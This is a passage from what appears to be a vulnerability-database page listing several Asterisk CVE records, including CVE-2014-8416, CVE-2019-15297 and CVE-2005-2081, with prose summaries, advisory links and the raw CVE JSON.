            "x_refsource_OSVDB"
          ],
          "url": "http://www.osvdb.org/73307"
        },
        {
          "name": "48431",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/48431"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://downloads.asterisk.org/pub/security/AST-2011-008.html"
        },
        {
          "name": "45239",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/45239"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://downloads.asterisk.org/pub/security/AST-2011-008.diff"
        },
        {
          "name": "DSA-2276",
          "tags": [
            "vendor-advisory",
            "x_refsource_DEBIAN"
          ],
          "url": "http://www.debian.org/security/2011/dsa-2276"
        },
        {
          "name": "FEDORA-2011-8914",
          "tags": [
            "vendor-advisory",
            "x_refsource_FEDORA"
          ],
          "url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-July/062628.html"
        },
        {
          "name": "45048",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/45048"
        },
        {
          "name": "1025706",
          "tags": [
            "vdb-entry",
            "x_refsource_SECTRACK"
          ],
          "url": "http://securitytracker.com/id?1025706"
        },
        {
          "name": "45201",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/45201"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2011-2529",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "chan_sip.c in the SIP channel driver in Asterisk Open Source 1.6.x before 1.6.2.18.1 and 1.8.x before 1.8.4.3 does not properly handle \u0027\\0\u0027 characters in SIP packets, which allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via a crafted packet."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "asterisk-sipsockread-dos(68203)",
              "refsource": "XF",
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/68203"
            },
            {
              "name": "73307",
              "refsource": "OSVDB",
              "url": "http://www.osvdb.org/73307"
            },
            {
              "name": "48431",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/48431"
            },
            {
              "name": "http://downloads.asterisk.org/pub/security/AST-2011-008.html",
              "refsource": "CONFIRM",
              "url": "http://downloads.asterisk.org/pub/security/AST-2011-008.html"
            },
            {
              "name": "45239",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/45239"
            },
            {
              "name": "http://downloads.asterisk.org/pub/security/AST-2011-008.diff",
              "refsource": "CONFIRM",
              "url": "http://downloads.asterisk.org/pub/security/AST-2011-008.diff"
            },
            {
              "name": "DSA-2276",
              "refsource": "DEBIAN",
              "url": "http://www.debian.org/security/2011/dsa-2276"
            },
            {
              "name": "FEDORA-2011-8914",
              "refsource": "FEDORA",
              "url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-July/062628.html"
            },
            {
              "name": "45048",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/45048"
            },
            {
              "name": "1025706",
              "refsource": "SECTRACK",
              "url": "http://securitytracker.com/id?1025706"
            },
            {
              "name": "45201",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/45201"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2011-2529",
    "datePublished": "2011-07-06T19:00:00",
    "dateReserved": "2011-06-16T00:00:00",
    "dateUpdated": "2024-08-06T23:08:22.019Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2014-8416

Vulnerability from cvelistv5

Published

2014-11-24 15:00

Modified

2024-08-06 13:18

Severity ?

Summary

Use-after-free vulnerability in the PJSIP channel driver in Asterisk Open Source 12.x before 12.7.1 and 13.x before 13.0.1, when using the res_pjsip_refer module, allows remote attackers to cause a denial of service (crash) via an in-dialog INVITE with Replaces message, which triggers the channel to be hung up.

References

▼	URL	Tags
	http://downloads.asterisk.org/pub/security/AST-2014-016.html	x_refsource_CONFIRM

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T13:18:47.980Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://downloads.asterisk.org/pub/security/AST-2014-016.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2014-11-20T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "Use-after-free vulnerability in the PJSIP channel driver in Asterisk Open Source 12.x before 12.7.1 and 13.x before 13.0.1, when using the res_pjsip_refer module, allows remote attackers to cause a denial of service (crash) via an in-dialog INVITE with Replaces message, which triggers the channel to be hung up."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2014-11-24T13:57:00",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://downloads.asterisk.org/pub/security/AST-2014-016.html"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2014-8416",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Use-after-free vulnerability in the PJSIP channel driver in Asterisk Open Source 12.x before 12.7.1 and 13.x before 13.0.1, when using the res_pjsip_refer module, allows remote attackers to cause a denial of service (crash) via an in-dialog INVITE with Replaces message, which triggers the channel to be hung up."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "http://downloads.asterisk.org/pub/security/AST-2014-016.html",
              "refsource": "CONFIRM",
              "url": "http://downloads.asterisk.org/pub/security/AST-2014-016.html"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2014-8416",
    "datePublished": "2014-11-24T15:00:00",
    "dateReserved": "2014-10-22T00:00:00",
    "dateUpdated": "2024-08-06T13:18:47.980Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2019-15297

Vulnerability from cvelistv5

Published

2019-09-09 20:48

Modified

2024-08-05 00:42

Severity ?

Summary

res_pjsip_t38 in Sangoma Asterisk 15.x before 15.7.4 and 16.x before 16.5.1 allows an attacker to trigger a crash by sending a declined stream in a response to a T.38 re-invite initiated by Asterisk. The crash occurs because of a NULL session media object dereference.

References

▼	URL	Tags
	http://packetstormsecurity.com/files/154371/Asterisk-Project-Security-Advisory-AST-2019-004.html	x_refsource_MISC
	http://downloads.asterisk.org/pub/security/AST-2019-004.html	x_refsource_CONFIRM
	http://seclists.org/fulldisclosure/2021/Mar/5	mailing-list, x_refsource_FULLDISC
	http://packetstormsecurity.com/files/161671/Asterisk-Project-Security-Advisory-AST-2021-006.html	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-05T00:42:03.821Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://packetstormsecurity.com/files/154371/Asterisk-Project-Security-Advisory-AST-2019-004.html"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://downloads.asterisk.org/pub/security/AST-2019-004.html"
          },
          {
            "name": "20210304 AST-2021-006: Crash when negotiating T.38 with a zero port",
            "tags": [
              "mailing-list",
              "x_refsource_FULLDISC",
              "x_transferred"
            ],
            "url": "http://seclists.org/fulldisclosure/2021/Mar/5"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://packetstormsecurity.com/files/161671/Asterisk-Project-Security-Advisory-AST-2021-006.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "res_pjsip_t38 in Sangoma Asterisk 15.x before 15.7.4 and 16.x before 16.5.1 allows an attacker to trigger a crash by sending a declined stream in a response to a T.38 re-invite initiated by Asterisk. The crash occurs because of a NULL session media object dereference."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2022-08-30T06:37:17",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://packetstormsecurity.com/files/154371/Asterisk-Project-Security-Advisory-AST-2019-004.html"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://downloads.asterisk.org/pub/security/AST-2019-004.html"
        },
        {
          "name": "20210304 AST-2021-006: Crash when negotiating T.38 with a zero port",
          "tags": [
            "mailing-list",
            "x_refsource_FULLDISC"
          ],
          "url": "http://seclists.org/fulldisclosure/2021/Mar/5"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://packetstormsecurity.com/files/161671/Asterisk-Project-Security-Advisory-AST-2021-006.html"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2019-15297",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "res_pjsip_t38 in Sangoma Asterisk 15.x before 15.7.4 and 16.x before 16.5.1 allows an attacker to trigger a crash by sending a declined stream in a response to a T.38 re-invite initiated by Asterisk. The crash occurs because of a NULL session media object dereference."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "http://packetstormsecurity.com/files/154371/Asterisk-Project-Security-Advisory-AST-2019-004.html",
              "refsource": "MISC",
              "url": "http://packetstormsecurity.com/files/154371/Asterisk-Project-Security-Advisory-AST-2019-004.html"
            },
            {
              "name": "http://downloads.asterisk.org/pub/security/AST-2019-004.html",
              "refsource": "CONFIRM",
              "url": "http://downloads.asterisk.org/pub/security/AST-2019-004.html"
            },
            {
              "name": "20210304 AST-2021-006: Crash when negotiating T.38 with a zero port",
              "refsource": "FULLDISC",
              "url": "http://seclists.org/fulldisclosure/2021/Mar/5"
            },
            {
              "name": "http://packetstormsecurity.com/files/161671/Asterisk-Project-Security-Advisory-AST-2021-006.html",
              "refsource": "MISC",
              "url": "http://packetstormsecurity.com/files/161671/Asterisk-Project-Security-Advisory-AST-2021-006.html"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2019-15297",
    "datePublished": "2019-09-09T20:48:12",
    "dateReserved": "2019-08-21T00:00:00",
    "dateUpdated": "2024-08-05T00:42:03.821Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2017-17664

Vulnerability from cvelistv5

Published

2017-12-13 20:00

Modified

2024-08-05 20:59

Severity ?

Summary

A Remote Crash issue was discovered in Asterisk Open Source 13.x before 13.18.4, 14.x before 14.7.4, and 15.x before 15.1.4 and Certified Asterisk before 13.13-cert9. Certain compound RTCP packets cause a crash in the RTCP Stack.

References

▼	URL	Tags
	http://downloads.digium.com/pub/security/AST-2017-012.html	x_refsource_MISC
	https://issues.asterisk.org/jira/browse/ASTERISK-27429	x_refsource_MISC
	http://www.securityfocus.com/bid/102201	vdb-entry, x_refsource_BID
	http://www.securitytracker.com/id/1040009	vdb-entry, x_refsource_SECTRACK
	https://www.debian.org/security/2017/dsa-4076	vendor-advisory, x_refsource_DEBIAN
	https://issues.asterisk.org/jira/browse/ASTERISK-27382	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-05T20:59:17.343Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://downloads.digium.com/pub/security/AST-2017-012.html"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://issues.asterisk.org/jira/browse/ASTERISK-27429"
          },
          {
            "name": "102201",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/102201"
          },
          {
            "name": "1040009",
            "tags": [
              "vdb-entry",
              "x_refsource_SECTRACK",
              "x_transferred"
            ],
            "url": "http://www.securitytracker.com/id/1040009"
          },
          {
            "name": "DSA-4076",
            "tags": [
              "vendor-advisory",
              "x_refsource_DEBIAN",
              "x_transferred"
            ],
            "url": "https://www.debian.org/security/2017/dsa-4076"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://issues.asterisk.org/jira/browse/ASTERISK-27382"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2017-12-13T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "A Remote Crash issue was discovered in Asterisk Open Source 13.x before 13.18.4, 14.x before 14.7.4, and 15.x before 15.1.4 and Certified Asterisk before 13.13-cert9. Certain compound RTCP packets cause a crash in the RTCP Stack."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2017-12-31T10:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://downloads.digium.com/pub/security/AST-2017-012.html"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://issues.asterisk.org/jira/browse/ASTERISK-27429"
        },
        {
          "name": "102201",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/102201"
        },
        {
          "name": "1040009",
          "tags": [
            "vdb-entry",
            "x_refsource_SECTRACK"
          ],
          "url": "http://www.securitytracker.com/id/1040009"
        },
        {
          "name": "DSA-4076",
          "tags": [
            "vendor-advisory",
            "x_refsource_DEBIAN"
          ],
          "url": "https://www.debian.org/security/2017/dsa-4076"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://issues.asterisk.org/jira/browse/ASTERISK-27382"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2017-17664",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "A Remote Crash issue was discovered in Asterisk Open Source 13.x before 13.18.4, 14.x before 14.7.4, and 15.x before 15.1.4 and Certified Asterisk before 13.13-cert9. Certain compound RTCP packets cause a crash in the RTCP Stack."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "http://downloads.digium.com/pub/security/AST-2017-012.html",
              "refsource": "MISC",
              "url": "http://downloads.digium.com/pub/security/AST-2017-012.html"
            },
            {
              "name": "https://issues.asterisk.org/jira/browse/ASTERISK-27429",
              "refsource": "MISC",
              "url": "https://issues.asterisk.org/jira/browse/ASTERISK-27429"
            },
            {
              "name": "102201",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/102201"
            },
            {
              "name": "1040009",
              "refsource": "SECTRACK",
              "url": "http://www.securitytracker.com/id/1040009"
            },
            {
              "name": "DSA-4076",
              "refsource": "DEBIAN",
              "url": "https://www.debian.org/security/2017/dsa-4076"
            },
            {
              "name": "https://issues.asterisk.org/jira/browse/ASTERISK-27382",
              "refsource": "MISC",
              "url": "https://issues.asterisk.org/jira/browse/ASTERISK-27382"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2017-17664",
    "datePublished": "2017-12-13T20:00:00",
    "dateReserved": "2017-12-13T00:00:00",
    "dateUpdated": "2024-08-05T20:59:17.343Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2021-26717

Vulnerability from cvelistv5

Published

2021-02-18 19:39

Modified

2024-08-03 20:33

Severity ?

Summary

An issue was discovered in Sangoma Asterisk 16.x before 16.16.1, 17.x before 17.9.2, and 18.x before 18.2.1 and Certified Asterisk before 16.8-cert6. When re-negotiating for T.38, if the initial remote response was delayed just enough, Asterisk would send both audio and T.38 in the SDP. If this happened, and the remote responded with a declined T.38 stream, then Asterisk would crash.

References

▼	URL	Tags
	https://downloads.asterisk.org/pub/security/	x_refsource_MISC
	http://seclists.org/fulldisclosure/2021/Feb/58	mailing-list, x_refsource_FULLDISC
	https://downloads.asterisk.org/pub/security/AST-2021-002.html	x_refsource_CONFIRM
	https://issues.asterisk.org/jira/browse/ASTERISK-29203	x_refsource_CONFIRM
	http://packetstormsecurity.com/files/161471/Asterisk-Project-Security-Advisory-AST-2021-002.html	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T20:33:40.586Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://downloads.asterisk.org/pub/security/"
          },
          {
            "name": "20210218 AST-2021-002: Remote crash possible when negotiating T.38",
            "tags": [
              "mailing-list",
              "x_refsource_FULLDISC",
              "x_transferred"
            ],
            "url": "http://seclists.org/fulldisclosure/2021/Feb/58"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://downloads.asterisk.org/pub/security/AST-2021-002.html"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://issues.asterisk.org/jira/browse/ASTERISK-29203"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://packetstormsecurity.com/files/161471/Asterisk-Project-Security-Advisory-AST-2021-002.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "An issue was discovered in Sangoma Asterisk 16.x before 16.16.1, 17.x before 17.9.2, and 18.x before 18.2.1 and Certified Asterisk before 16.8-cert6. When re-negotiating for T.38, if the initial remote response was delayed just enough, Asterisk would send both audio and T.38 in the SDP. If this happened, and the remote responded with a declined T.38 stream, then Asterisk would crash."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2021-02-19T15:06:09",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://downloads.asterisk.org/pub/security/"
        },
        {
          "name": "20210218 AST-2021-002: Remote crash possible when negotiating T.38",
          "tags": [
            "mailing-list",
            "x_refsource_FULLDISC"
          ],
          "url": "http://seclists.org/fulldisclosure/2021/Feb/58"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://downloads.asterisk.org/pub/security/AST-2021-002.html"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://issues.asterisk.org/jira/browse/ASTERISK-29203"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://packetstormsecurity.com/files/161471/Asterisk-Project-Security-Advisory-AST-2021-002.html"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2021-26717",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "An issue was discovered in Sangoma Asterisk 16.x before 16.16.1, 17.x before 17.9.2, and 18.x before 18.2.1 and Certified Asterisk before 16.8-cert6. When re-negotiating for T.38, if the initial remote response was delayed just enough, Asterisk would send both audio and T.38 in the SDP. If this happened, and the remote responded with a declined T.38 stream, then Asterisk would crash."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://downloads.asterisk.org/pub/security/",
              "refsource": "MISC",
              "url": "https://downloads.asterisk.org/pub/security/"
            },
            {
              "name": "20210218 AST-2021-002: Remote crash possible when negotiating T.38",
              "refsource": "FULLDISC",
              "url": "http://seclists.org/fulldisclosure/2021/Feb/58"
            },
            {
              "name": "https://downloads.asterisk.org/pub/security/AST-2021-002.html",
              "refsource": "CONFIRM",
              "url": "https://downloads.asterisk.org/pub/security/AST-2021-002.html"
            },
            {
              "name": "https://issues.asterisk.org/jira/browse/ASTERISK-29203",
              "refsource": "CONFIRM",
              "url": "https://issues.asterisk.org/jira/browse/ASTERISK-29203"
            },
            {
              "name": "http://packetstormsecurity.com/files/161471/Asterisk-Project-Security-Advisory-AST-2021-002.html",
              "refsource": "MISC",
              "url": "http://packetstormsecurity.com/files/161471/Asterisk-Project-Security-Advisory-AST-2021-002.html"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2021-26717",
    "datePublished": "2021-02-18T19:39:46",
    "dateReserved": "2021-02-05T00:00:00",
    "dateUpdated": "2024-08-03T20:33:40.586Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2005-2081

Vulnerability from cvelistv5

Published

2005-06-30 04:00

Modified

2024-08-07 22:15

Severity ?

Summary

Stack-based buffer overflow in the function that parses commands in Asterisk 1.0.7, when the 'write = command' option is enabled, allows remote attackers to execute arbitrary code via a command that has two double quotes followed by a tab character.

References

▼	URL	Tags
	http://marc.info/?l=bugtraq&m=111946399501080&w=2	mailing-list, x_refsource_BUGTRAQ
	https://exchange.xforce.ibmcloud.com/vulnerabilities/21115	vdb-entry, x_refsource_XF
	http://www.portcullis-security.com/advisory/advisory-05-013.txt	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-07T22:15:37.340Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "20050622 Portcullis Security Advisory 05-013 - VoIP - Asterisk Stack Overflow",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://marc.info/?l=bugtraq\u0026m=111946399501080\u0026w=2"
          },
          {
            "name": "asterisk-manager-interface-bo(21115)",
            "tags": [
              "vdb-entry",
              "x_refsource_XF",
              "x_transferred"
            ],
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/21115"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://www.portcullis-security.com/advisory/advisory-05-013.txt"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2005-06-22T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "Stack-based buffer overflow in the function that parses commands in Asterisk 1.0.7, when the \u0027write = command\u0027 option is enabled, allows remote attackers to execute arbitrary code via a command that has two double quotes followed by a tab character."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2017-07-10T14:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "20050622 Portcullis Security Advisory 05-013 - VoIP - Asterisk Stack Overflow",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://marc.info/?l=bugtraq\u0026m=111946399501080\u0026w=2"
        },
        {
          "name": "asterisk-manager-interface-bo(21115)",
          "tags": [
            "vdb-entry",
            "x_refsource_XF"
          ],
          "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/21115"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://www.portcullis-security.com/advisory/advisory-05-013.txt"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2005-2081",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Stack-based buffer overflow in the function that parses commands in Asterisk 1.0.7, when the \u0027write = command\u0027 option is enabled, allows remote attackers to execute arbitrary code via a command that has two double quotes followed by a tab character."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "20050622 Portcullis Security Advisory 05-013 - VoIP - Asterisk Stack Overflow",
              "refsource": "BUGTRAQ",
